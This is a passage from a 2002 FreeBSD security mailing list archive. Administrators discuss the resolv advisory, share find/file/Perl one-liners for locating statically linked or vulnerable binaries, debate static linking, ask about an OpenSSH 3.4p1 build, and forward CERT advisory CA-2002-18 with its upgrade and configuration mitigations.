many of=20 these people were using a version of OpenSSH that did not contain the=20 vulnerability (remember, this is a FreeBSD list here). Thanks once again for your work, Theo. I just wish things had gone a=20 little bit more smoothly! Regards Wincent To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 21:43: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from suma.adm.s.u-tokyo.ac.jp (suma.adm.s.u-tokyo.ac.jp [133.11.170.11]) by hub.freebsd.org (Postfix) with ESMTP id F319437B405 for ; Wed, 26 Jun 2002 21:43:00 -0700 (PDT) Received: from suma.adm.s.u-tokyo.ac.jp (localhost [127.0.0.1]) by suma.adm.s.u-tokyo.ac.jp (8.9.3/3.7W) with ESMTP id NAA22234 for ; Thu, 27 Jun 2002 13:42:59 +0900 (JST) Received: from localhost (raven.adm.s.u-tokyo.ac.jp [133.11.170.110]) by suma.adm.s.u-tokyo.ac.jp (8.9.3/3.7W) with ESMTP id NAA22210; Thu, 27 Jun 2002 13:42:47 +0900 (JST) Date: Thu, 27 Jun 2002 13:42:46 +0900 (JST) Message-Id: <20020627.134246.66136331.natori@adm.s.u-tokyo.ac.jp> To: kevin.way@overtone.org Cc: brian@hyperreal.org, freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv From: NATORI Shin In-Reply-To: <20020627033441.GA99268@overtone.org> References: <20020626152851.Q310-100000@yez.hyperreal.org> <20020627033441.GA99268@overtone.org> X-Mailer: Mew version 2.2 on Emacs 21.2 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, From: Kevin Way Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv Date: Wed, 26 Jun 2002 23:34:41 -0400 > On Wed, Jun 26, 2002 at 03:29:45PM -0700, Brian Behlendorf wrote: > > Sorry for the newbie question here, but is there a way to programmatically > > determine which binaries on a system static-linked libc? I tried "nm" but > > that needs non-stripped executables... > > quick, dirty, evil, and maybe even effective? > > -Kevin Way > > #!/usr/local/bin/bash > > function dir_walk() > { > for test in $1/* > do > if [ $test = '.' -o $test = '..' ] > then > break > elif [ -d $test ] > then > dir_walk $test > else > do_something $test > fi > done > } > > function do_something() > { > if file $1 | grep 'statically linked' > /dev/null 2>&1 > then > echo "well shit, $1 is statically linked" > fi > } > > dir_walk / Perhaps this one is faster find / -type f -print0 | xargs -0 file | grep -i 'statically linked' FYI: I used the following one-liner to detect vulnerable binaries. This is not very effective, needs a lot of memory, and will not detect vulnerable binaries that have been linked to old libc. Therefore I can not make any guarantee, but at least it seems to work well on my box. find / -type f -print0 | xargs -0 file | grep -i 'statically linked' | perl -e 'while (<>) { my ($file) = split(/:/); if (open(IN, "<$file")) { my $s = join("", ); close(IN); if ($s =~ m%gethostby\*\.gethostanswer: asked for% || $s =~ m/%u\.%u\.%u\.%u\.in-addr\.arpa/ || $s =~ m%in-addr\.arpa% && $s =~ m%/etc/hosts% && $s =~ m%/etc/host\.conf%) { print $file, "\n"; }} else { print STDERR "Cannot open $file\n"; }}' # NOTE: # It seems that there are three vulnerable source files: gethostbydns.c, # getnetbydns.c, name6.c (according to # ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:28/resolv.patch) # The above one-liner detect these files, using the fact that # "gethostby*.gethostanswer: asked for" appears in gethostbydns.c, # "%u.%u.%u.%u.in-addr.arpa" appears in getnetbydns.c, and # "/etc/hosts", "/etc/host.conf" and "in-addr.arpa" appear in name6.c. -- /* NATORI Shin, natori@adm.s.u-tokyo.ac.jp */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 21:54: 1 2002 Delivered-To: freebsd-security@freebsd.org Received: from pcp01360967pcs.jamisn01.pa.comcast.net (pcp01360967pcs.jamisn01.pa.comcast.net [68.80.217.72]) by hub.freebsd.org (Postfix) with ESMTP id 4C38337B400 for ; Wed, 26 Jun 2002 21:53:59 -0700 (PDT) Received: from pcp01360967pcs.jamisn01.pa.comcast.net (3osspv7ld74ixrbx@localhost [127.0.0.1]) by pcp01360967pcs.jamisn01.pa.comcast.net (8.12.3/8.12.3) with ESMTP id g5R4rpeY089844; Thu, 27 Jun 2002 00:53:51 -0400 (EDT) (envelope-from kway@pcp01360967pcs.jamisn01.pa.comcast.net) Received: (from kway@localhost) by pcp01360967pcs.jamisn01.pa.comcast.net (8.12.4/8.12.4/Submit) id g5R4qZfe021076; Thu, 27 Jun 2002 00:52:35 -0400 (EDT) Date: Thu, 27 Jun 2002 00:52:35 -0400 From: Kevin Way To: NATORI Shin Cc: freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv Message-ID: <20020627045235.GA3056@overtone.org> References: <20020626152851.Q310-100000@yez.hyperreal.org> <20020627033441.GA99268@overtone.org> <20020627.134246.66136331.natori@adm.s.u-tokyo.ac.jp> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020627.134246.66136331.natori@adm.s.u-tokyo.ac.jp> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jun 27, 2002 at 01:42:46PM +0900, NATORI Shin wrote: > find / -type f -print0 | xargs -0 file | grep -i 'statically linked' that's much better. for some odd reason i didn't think about find until about 10 seconds after i hit send... apparently i left my head in some other time zone or something. -Kevin Way To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 21:56:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.deltanet.com (mail.deltanet.com [216.237.144.132]) by hub.freebsd.org (Postfix) with ESMTP id 9961D37B400 for ; Wed, 26 Jun 2002 21:56:42 -0700 (PDT) Received: from mammoth.eat.frenchfries.net (da001d0875.lax-ca.osd.concentric.net [64.0.147.108]) by mail.deltanet.com (8.11.6/8.11.6) with ESMTP id g5R4WAO14107 for ; Wed, 26 Jun 2002 21:32:11 -0700 Received: by mammoth.eat.frenchfries.net (Postfix, from userid 1000) id 9F39450A4; Wed, 26 Jun 2002 21:55:11 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by mammoth.eat.frenchfries.net (Postfix) with ESMTP id 9C8784DC5; Wed, 26 Jun 2002 21:55:11 -0700 (PDT) Date: Wed, 26 Jun 2002 21:55:11 -0700 (PDT) From: Paul Herman X-X-Sender: pherman@mammoth.eat.frenchfries.net To: Roger Marquis Cc: security@FreeBSD.ORG Subject: Re: Legacy Static Linking (was: Security Advisory FreeBSD-SA-02:28.resolv) In-Reply-To: <20020626183519.F36946-100000@roble.com> Message-ID: <20020626213923.M86130-100000@mammoth.eat.frenchfries.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 26 Jun 2002, Roger Marquis wrote: > Robert Watson wrote: > >You will catch most applications simply by rebuilding libc and > >reinstalling. Unfortunately, some applications are statically linked, and > >they must be individually relinked against the new libc and reinstalled. > > This makes a good case for doing away with static linking of system > binaries. No, the ease of administration makes a good case for doing away with static linking, security doesn't. From a security perspective, there are some disadvantages of dynamic libraries. Although it's not new to use LD_PRELOAD to use to a hackers advantage, right now I'm thinking of the BUGTRAQ "ssh environment" article but there are certainly other applications. Switching completely to either static OR shared libraries will not necessarily improve your security. Both have pros and cons. -Paul. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 21:57:41 2002 Delivered-To: freebsd-security@freebsd.org Received: from kobold.compt.com (TBextgw.compt.com [209.115.146.18]) by hub.freebsd.org (Postfix) with ESMTP id 9A0F337B414 for ; Wed, 26 Jun 2002 21:57:15 -0700 (PDT) Date: Thu, 27 Jun 2002 00:57:11 -0400 From: Klaus Steden To: Albert Martinez Cc: freebsd-security@FreeBSD.ORG Subject: Re: Viruses attaahce to emails in this mailing list Message-ID: <20020627005711.W589@cthulu.compt.com> References: <20020626125754.GD70856@isnic.is> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: ; from albertem@bellatlantic.net on Wed, Jun 26, 2002 at 11:00:42AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Hmm, interesting, virus delivery via attachments on a security list. What > reason is there for this list to allow attachments? Why wouldn't somebody > protect themselves from these virii? > Isn't the security of an individual system the responsibility of sys. admins? :> Klaus To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 22: 2:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from laptop.tenebras.com (laptop.tenebras.com [66.92.188.18]) by hub.freebsd.org (Postfix) with SMTP id 315E237B40F for ; Wed, 26 Jun 2002 22:02:20 -0700 (PDT) Received: (qmail 2944 invoked from network); 27 Jun 2002 05:02:18 -0000 Received: from sapphire.tenebras.com (HELO tenebras.com) (66.92.188.241) by 0 with SMTP; 27 Jun 2002 05:02:18 -0000 Message-ID: <3D1A9C5A.6030803@tenebras.com> Date: Wed, 26 Jun 2002 22:02:18 -0700 From: Michael Sierchio User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0.0) Gecko/20020626 X-Accept-Language: en-us, en, fr-fr, ru MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Re: Now I'm really confused! References: <3D1A334E.40076AD0@pantherdragon.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Not surprising that there is lingering confusion on this subject -- there has been a great deal of heat (and flatulence) and little light or insight here. The CERT advisory is lucid and concise: http://www.cert.org/advisories/CA-2002-18.html And they don't act like emotional retards while promulgating info, either ;-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 22: 7:10 2002 Delivered-To: freebsd-security@freebsd.org Received: from edgemaster.zombie.org (ip68-13-69-9.om.om.cox.net [68.13.69.9]) by hub.freebsd.org (Postfix) with ESMTP id BAF5237B409 for ; Wed, 26 Jun 2002 22:06:20 -0700 (PDT) Received: by edgemaster.zombie.org (Postfix, from userid 1001) id A37CD66B04; Thu, 27 Jun 2002 00:06:13 -0500 (CDT) Date: Thu, 27 Jun 2002 00:06:13 -0500 From: Sean Kelly To: security@freebsd.org Subject: Another one? Message-ID: <20020627050613.GA11039@edgemaster.zombie.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org According to CERT, us OpenSSH 2.9 users aren't safe either. ----- Forwarded message from CERT Advisory ----- Date: Wed, 26 Jun 2002 19:06:32 -0400 (EDT) From: CERT Advisory To: cert-advisory@cert.org Subject: CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response Handling Original release date: June 26, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * OpenSSH versions 2.3.1p1 through 3.3 Overview There are two related vulnerabilities in the challenge response handling code in OpenSSH versions 2.3.1p1 through 3.3. They may allow a remote intruder to execute arbitrary code as the user running sshd (often root). The first vulnerability affects OpenSSH versions 2.9.9 through 3.3 that have the challenge response option enabled and that use SKEY or BSD_AUTH authentication. The second vulnerability affects PAM modules using interactive keyboard authentication in OpenSSH versions 2.3.1p1 through 3.3, regardless of the challenge response option setting. Additionally, a number of other possible security problems have been corrected in OpenSSH version 3.4. I. Description Two related vulnerabilities have been found in the handling of challenge responses in OpenSSH. The first vulnerability is an integer overflow in the handling of the number of responses received during challenge response authentication. If the challenge response configuration option is set to yes and the system is using SKEY or BSD_AUTH authentication then a remote intruder may be able to exploit the vulnerability to execute arbitrary code. This vulnerability is present in versions of OpenSSH 2.9.9 through 3.3. An exploit for this vulnerability is reported to exist. This vulnerability is partially described in a recent ISS security advisory available at http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20584 The second vulnerability is a buffer overflow involving the number of responses received during challenge response authentication. Regardless of the setting of the challenge response configuration option, systems using PAM modules that use interactive keyboard authentication (PAMAuthenticationViaKbdInt), may be vulnerable to the remote execution of code. At this time, it is not known if this vulnerability is exploitable. Both vulnerabilities are corrected by the patches in a recent OpenSSH security advisory available from http://www.openssh.com/txt/preauth.adv Both vulnerabilities exploit features present only in version 2 of the SSH protocol. Vulnerability Note VU#369347 lists the vendors we contacted about this vulnerability. The vulnerability note is available from http://www.kb.cert.org/vuls/id/369347 II. Impact A remote attacker can execute code with the privileges of the user running the sshd (often root). These vulnerabilities may also be used to cause a denial-of-service condition. III. Solution Upgrade to OpenSSH version 3.4 These vulnerabilities are eliminated by upgrading to OpenSSH version 3.4, which is available from the OpenSSH web site at http://www.openssh.com OpenSSH version 3.4 will correct several other software defects with potential security implications not described in this advisory. Apply a patch from your vendor A patch for this problem is included in the OpenSSH advisory at http://www.openssh.com/txt/preauth.adv This patch may be manually installed with minor changes to correct these vulnerabilities in all affected versions of OpenSSH. Please note that applying the patches described in the OpenSSH advisory does not correct the other software defects with potential security implications not described in this advisory. If your vendor has provided a patch to correct these vulnerabilities, you may want to apply their patch rather than upgrading your version of sshd. System administrators may want to confirm whether their vendor's patch includes the other possible vulnerabilities corrected in OpenSSH 3.4. More information about vendor-specific patches can be found in the vendor section of this document. Because the publication of this advisory was unexpectedly accelerated, statements from all of the affected vendors were not available at publication time. We will update this document as vendors provide additional information. Disable SSH protocol version 2 Since both vulnerabilities are present only in protocol version 2 features, disabling version 2 of the protocol will prevent both vulnerabilities from being exploited. Typically, this is accomplished by adding the following line to /etc/ssh/sshd_config: Protocol 1 This option may set to "2,1" by default. System administrators should be aware that disabling protocol version 2 may prevent the sshd daemon from accepting connections in certain configurations. Applying one or both of the configuration changes described below may be a less disruptive workaround for this problem. Disable challenge response authentication For OpenSSH versions greater than 2.9, system administrators can disable the vulnerable portion of the code by setting the "ChallengeResponseAuthentication" configuration option to "no" in their sshd configuration file. Typically, this is accomplished by adding the following line to /etc/ssh/sshd_config: ChallengeResponseAuthentication no This option may be enabled (set to "yes") by default. This workaround should prevent the first vulnerability from being exploited if SKEY or BSD_AUTH authentication is used. It will not prevent the possible exploitation of the vulnerability via PAM interactive keyboard authentication. Disable PAM authentication via interactive keyboard For OpenSSH versions greater than 2.9, system administrators can disable the vulnerable portion of the code affecting the PAM authentication issue by setting the "PAMAuthenticationViaKbdInt" configuration option to "no" in their sshd configuration file. Typically, this is accomplished by adding the following line to /etc/ssh/sshd_config: PAMAuthenticationViaKbdInt no This option may be disabled (set to "no") by default. This workaround should prevent the second vulnerability from being exploited if PAM interactive keyboard authentication is used. It will not prevent the possible exploitation of the vulnerability via SKEY or BSD_AUTH authentication. Disable both options in older versions of OpenSSH For OpenSSH versions between 2.3.1p1 and 2.9, system adminstrators will instead need to set the following options in their ssh configuration file: KbdInteractiveAuthentication no ChallengeResponseAuthentication no Setting both of these options is believed to prevent the exploitation of the vulnerabilities regardless of which authentication mechanisms are used. Use privilege separation to minimize impact System administrators running OpenSSH versions 3.2 or 3.3 may be able to reduce the impact of this vulnerability by enabling the "UsePrivilegeSeparation" configuration option in their sshd configuration file. Typically, this is accomplished by adding the following line to /etc/ssh/sshd_config: UsePrivilegeSeparation yes This workaround does not prevent these vulnerabilities from being exploited, however due to the privilege separation mechanism, the intruder may be limited to a constrained chroot environment with restricted privileges. This workaround will not prevent these vulnerabilities from creating a denial-of-service condition. Not all operating system vendors have implemented the privilege separation code, and on some operating systems, it may limit the functionality of OpenSSH. System administrators are encouraged to carefully review the implications of using the workaround in their environment, and use a more comprehensive solution if one is available. The use of privilege separation to limit the impact of future vulnerabilities is encouraged. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Compaq Computer Corporation SOURCE: Compaq Computer Corporation, a wholly-owned subsidiary of Hewlett-Packard Company and Hewlett-Packard Company HP Services. Software Security Response Team x-ref:SSRT2263 At the time of writing this document, Compaq is currently investigating the potential impact to HP Tru64 UNIX, commercial version of SSH for V5.1a. As further information becomes available notice will be provided of the completion/availability of any necessary patches through standard product and security bulletin announcements and be available from your normal HP Services support channel. Caldera Caldera OpenLinux OpenSSH has neither the S/KEY nor BSD Auth features compiled in, so it is not vulnerable to the Challenge/Response vulnerability. We do have the ChallengeResponseAuthentication option on by default, however, so to be safe, we recommend that the option be disabled in the sshd_config file. In addition, the sshd_config PAMAuthenticationViaKbdInt option is off by default, so OpenLinux is not vulnerable to the other alleged vulnerability in a default configuration, either. However, Caldera recommends that this option be disabled if it has been enabled by the system administrator. Cray, Inc. Cray, Inc. has found the OpenSSH released in Cray Open Software 3.0 to be vulnerable. Please see Field Notice 5105 and spr 722588 for fix information. Debian Debian 2.2 (the current stable release) is not affected by these problems. The current versions of our "testing" distribution, to become Debian 3.0, and our "unstable" distribution, are both affected by default. We recommend that users be certain that both: ChallengeResponseAuthentication no and PAMAuthenticationViaKbdInt no are present and uncommented in /etc/ssh/sshd_config (and that the server is restarted). Also, we recommend the use of version 3.3p1, now available from security.debian.org (DSA-134). Stable users do not need to upgrade and may wish to wait until the packages have received better testing. We intend to provide 3.4p1 packages in the near future. Engarde Guardian Digital ships OpenSSH in all versions of EnGarde Secure Linux. Version 3.3p1 was introduced by ESA-20020625-015 on June 25, 2002. This update introduces privilege separation. All users are strongly urged to upgrade to this version as soon as possible. An upgrade to version 3.4p1 (which properly fixes the bugs) will be made available sometime in the next few days. Hewlett-Packard Company Hewlett-Packard provides a version of SSH: HP-UX Secure Shell (T1471AA) for HP-UX versions 11.00 and 11i. We are investigating to determine whether this product is vulnerable. IBM Corporation IBM's AIX operating system does not ship with OpenSSH; however, OpenSSH is available for installation on AIX via the Linux Affinity Toolkit. The version included on the CD containing the Toolkit is vulnerable to the latest discovered vulnerability discussed here as is the version of OpenSSH available for downloading from the IBM Linux Affinity website. Anyone running this version is advised to follow the recommendations above to limit their vulnerability. We working with the changes for version 3.4 and will have a new package availble for download as soon as possible. When available the new packages can be downloaded from: http://www6.software.ibm.com/dl/aixtbx/aixtbx-p This site contains Linux Affinity applications containing cryptographic algorithms, and new users of this site are asked to register first. Lotus Lotus products are not vulnerable to this problem. Mandrake Software MandrakeSoft released OpenSSH 3.3p1 in updates Monday night to mitigate this vulnerability. Updates to OpenSSH 3.4p1 will be available for download later this week. Microsoft Corporation Microsoft products are not affected by the issues detailed in this advisory. Network Appliance NetApp systems are not vulnerable to this problem. OpenBSD See http://www.openbsd.org/errata.html#sshd OpenSSH See http://www.openssh.com/txt/preauth.adv Process Software MultiNet, TCPware, and SSH for OpenVMS are not affected by the problems outlined in this advisory. RedHat Inc. Red Hat Linux versions 7, 7.1, 7.2 and 7.3 as well as Red Hat Linux Advanced Server version 2.1 ship with OpenSSH. The Red Hat Linux OpenSSH packages were not compiled with either BSD_AUTH or SKEY enabled, therefore in order to be vulnerable to this issue a user would need to have enabled the configuration option "PAMAuthenticationViaKbdInt" in their sshd configuration file (the default is disabled). We are continuing to investigate this vulnerability and will release updated packages where appropriate. SGI At this time, SGI does not ship OpenSSH as a part of IRIX. The OpenSSH privilege separation code mostly works with IRIX, but it uses a flag to mmap that isn't in IRIX (MAP_ANON) for compression so you can't have both on at the same time. IRIX doesn't ship with PAM so a lot of the PAM issues aren't issues for us. _________________________________________________________________ The CERT/CC thanks Theo de Raadt and Markus Friedl of the OpenSSH project for their technical assistance in producing this advisory. _________________________________________________________________ Author: Cory F. Cohen ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-18.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History June 26, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPRpGQ6CVPMXQI2HJAQEC1QP/eqRQzNmK0B1h5DvNLtTFmey8wOpfrSpX PHbJ2Ps4IYfu+OepUH7UEDGoYkza5jpIoqz+UeRmJfq51IU2RCwcfOOEkbLslra7 yFEM9oWIVCwC6cOvlkzlXA6cd2uX6YonNxYZ/6tUs3BmQVKxCrzDXBEWV6HC3zis 1qgt5S8MRYM= =+K4J -----END PGP SIGNATURE----- ----- End forwarded message ----- -- Sean Kelly | PGP KeyID: 77042C7B smkelly@zombie.org | http://www.zombie.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 22:25:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from kobold.compt.com (TBextgw.compt.com [209.115.146.18]) by hub.freebsd.org (Postfix) with ESMTP id CD41037B401 for ; Wed, 26 Jun 2002 22:25:12 -0700 (PDT) Date: Thu, 27 Jun 2002 01:25:10 -0400 From: Klaus Steden To: Roger Marquis Cc: security@FreeBSD.ORG Subject: Re: Legacy Static Linking (was: Security Advisory FreeBSD-SA-02:28.resolv) Message-ID: <20020627012510.X589@cthulu.compt.com> References: <20020626183519.F36946-100000@roble.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020626183519.F36946-100000@roble.com>; from marquis@roble.com on Wed, Jun 26, 2002 at 06:46:42PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > > This makes a good case for doing away with static linking of system > binaries. > > Why does FreeBSD have statically linked binaries? > I dunno, I find static binaries pretty damn useful as bootstrap and recovery tools on broken systems that don't necessarily run FreeBSD but whose disks I have to preserve. Static binaries still have a purpose, inasmuch as dynamic binaries have a purpose. I would be disappointed to discover static linking done away with ... however, a system-wide compile time option might not be a bad idea. $0.02, Klaus To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 22:28: 6 2002 Delivered-To: freebsd-security@freebsd.org Received: from alexus.org (alexus.org [66.181.169.114]) by hub.freebsd.org (Postfix) with ESMTP id 9B81437B400 for ; Wed, 26 Jun 2002 22:27:59 -0700 (PDT) Received: (qmail 98124 invoked by uid 85); 27 Jun 2002 05:27:53 -0000 Received: from alexus@alexus.org by c.alexus.biz by uid 82 with qmail-scanner-1.12 (uvscan: v4.1.60/v4202. . Clear:. Processed in 1.001662 secs); 27 Jun 2002 05:27:53 -0000 Received: from unknown (HELO alexus) (151.204.114.70) by 0 with RC4-MD5 encrypted SMTP; 27 Jun 2002 05:27:52 -0000 Message-ID: <000e01c21d9b$62886ec0$0f00a8c0@alexus> From: "alexus" To: Subject: new sshd 3.4p1 Date: Thu, 27 Jun 2002 01:27:47 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org any ideas why am i geting this ? [c] /usr/local/src/openssh-3.4p1# /usr/local/sbin/sshd This platform does not support both privilege separation and compression Compression disabled [c] /usr/local/src/openssh-3.4p1# [c] ~# id sshd uid=999(sshd) gid=999(sshd) groups=999(sshd) [c] ~# ls -ld /var/empty/ drwxr-xr-x 2 root sys 512 Jun 21 19:15 /var/empty/ [c] ~# this is new open sshd 3.4p1 thanks in advance To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 22:43:52 2002 Delivered-To: freebsd-security@freebsd.org Received: from angmar.mel.vet.com.au (angmar.mel.vet.com.au [203.39.245.7]) by hub.freebsd.org (Postfix) with ESMTP id 0B65B37B409 for ; Wed, 26 Jun 2002 22:43:32 -0700 (PDT) Received: from nargothrond.ca.com (nargothrond.ca.com [155.35.178.10]) by angmar.mel.vet.com.au (Postfix) with ESMTP id B4F9C14F302 for ; Thu, 27 Jun 2002 15:43:21 +1000 (EST) Received: from ca.com ([155.35.178.101]) by nargothrond.ca.com with esmtp; Thu, 27 Jun 2002 15:42:42 +1000 Message-ID: <3D1AA5F2.9020305@ca.com> Date: Thu, 27 Jun 2002 15:43:14 +1000 From: Lachlan O'Dea Organization: Computer Associates User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US; rv:1.0.0) Gecko/20020529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: resolv and dynamic linking to compat libc Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, With regard the resolv vulnerability, is there any issue with older binaries that are linking against an older libc.so? For example, on my box I have a /usr/lib/compat/libc.so.3. Will a make world fix this library as well? Thanks. -- Lachlan O'Dea Computer Associates Pty Ltd Webmaster Vet - Anti-Virus Software http://www.vet.com.au/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 22:45:58 2002 Delivered-To: freebsd-security@freebsd.org Received: from TYO201.gate.nec.co.jp (TYO201.gate.nec.co.jp [202.32.8.214]) by hub.freebsd.org (Postfix) with ESMTP id 00AA637B406 for ; Wed, 26 Jun 2002 22:45:54 -0700 (PDT) Received: from mailgate4.nec.co.jp ([10.7.69.195]) by TYO201.gate.nec.co.jp (8.11.6/3.7W01080315) with ESMTP id g5R5jlR04383; Thu, 27 Jun 2002 14:45:47 +0900 (JST) Received: from mailsv4.nec.co.jp (mailgate51.nec.co.jp [10.7.69.196]) by mailgate4.nec.co.jp (8.11.6/3.7W-MAILGATE-NEC) with ESMTP id g5R5jkL09190; Thu, 27 Jun 2002 14:45:46 +0900 (JST) Received: from necspl.do.mms.mt.nec.co.jp (necspl.do.mms.mt.nec.co.jp [10.16.5.21]) by mailsv4.nec.co.jp (8.11.6/3.7W-MAILSV4-NEC) with ESMTP id g5R5jj229558; Thu, 27 Jun 2002 14:45:45 +0900 (JST) Received: from localhost (localhost [127.0.0.1]) by necspl.do.mms.mt.nec.co.jp (8.12.5/8.12.5) with ESMTP id g5R5jgpC026315; Thu, 27 Jun 2002 14:45:42 +0900 (JST) Date: Thu, 27 Jun 2002 14:45:42 +0900 (JST) Message-Id: <20020627.144542.104107070.y-koga@jp.FreeBSD.org> To: freebsd-security@FreeBSD.ORG Subject: Re: new sshd 3.4p1 From: Koga Youichirou In-Reply-To: <000e01c21d9b$62886ec0$0f00a8c0@alexus> References: <000e01c21d9b$62886ec0$0f00a8c0@alexus> X-Mailer: Mew version 3.0.55 on Emacs 21.2 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "alexus" : > any ideas why am i geting this ? There occurs a syntax error in sys/mman.h while checking for mmap anon shared. 